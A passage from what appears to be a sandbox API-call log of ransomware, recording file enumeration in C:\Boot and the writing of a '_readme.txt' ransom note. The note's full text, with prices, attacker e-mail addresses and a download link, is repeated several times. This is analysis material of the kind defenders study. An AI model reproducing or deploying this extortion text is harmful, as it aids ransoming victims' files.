ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0227.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.963] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0227.963] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.963] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0227.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.963] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0227.963] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.965] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0227.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.965] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0227.965] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.965] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0227.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.965] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0227.965] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.966] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0227.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.966] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0227.966] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.966] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0227.966] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.966] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.966] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.967] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0227.967] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.967] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.967] PathFindFileNameW (pszPath="") returned="" [0227.967] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.968] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.968] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.968] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.968] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0227.968] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0227.969] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.969] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.969] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.969] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.969] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.969] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.969] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0227.969] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.970] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.970] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.970] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.970] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: 